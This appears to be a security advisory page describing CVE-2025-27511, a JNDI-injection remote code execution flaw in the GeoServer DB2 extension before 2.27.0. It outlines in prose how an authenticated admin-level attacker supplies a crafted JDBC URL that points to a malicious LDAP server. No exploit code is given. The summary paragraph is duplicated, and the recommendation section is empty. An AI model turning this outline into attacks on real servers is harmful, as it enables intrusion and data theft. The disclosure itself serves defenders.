EXECUTIVE SUMMARY:
CVE-2025-27511 with a CVSS score of 7.2 is a remote code execution flaw affecting the GeoServer DB2 DataStore extension (maven/org.geoserver.extension:gs-db2) in all releases prior to version 2.27.0; the vulnerability arises from the extension’s handling of DB2 JDBC connection strings, which allow unrestricted JNDI lookup parameters that are deserialized without validation. An attacker who has authenticated access to the GeoServer administrative interface can navigate to the Vector Data Sources page, create a new data store, and supply a maliciously crafted DB2 JDBC URL containing a JNDI reference to an attacker‑controlled LDAP server; the server then performs the JNDI lookup, deserializes the untrusted object, and executes arbitrary code supplied by the attacker. Successful exploitation grants the attacker full command‑execution privileges on the host running GeoServer, enabling data theft, service disruption, or further lateral movement within the network. Exploitation requires the DB2 extension to be installed, the vulnerable version to be in use, and a user account with rights to configure data stores; without these conditions, the attack vector is not viable.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
CVE-2025-27511 with a CVSS score of 7.2 is a remote code execution flaw affecting the GeoServer DB2 DataStore extension (maven/org.geoserver.extension:gs-db2) in all releases prior to version 2.27.0; the vulnerability arises from the extension’s handling of DB2 JDBC connection strings, which allow unrestricted JNDI lookup parameters that are deserialized without validation. An attacker who has authenticated access to the GeoServer administrative interface can navigate to the Vector Data Sources page, create a new data store, and supply a maliciously crafted DB2 JDBC URL containing a JNDI reference to an attacker‑controlled LDAP server; the server then performs the JNDI lookup, deserializes the untrusted object, and executes arbitrary code supplied by the attacker. Successful exploitation grants the attacker full command‑execution privileges on the host running GeoServer, enabling data theft, service disruption, or further lateral movement within the network. Exploitation requires the DB2 extension to be installed, the vulnerable version to be in use, and a user account with rights to configure data stores; without these conditions, the attack vector is not viable.[emaillocker id="1283"]
RECOMMENDATION:
REFERENCES:
The following reports contain further technical details:
https://github.com/advisories/GHSA-g628-r368-6vh7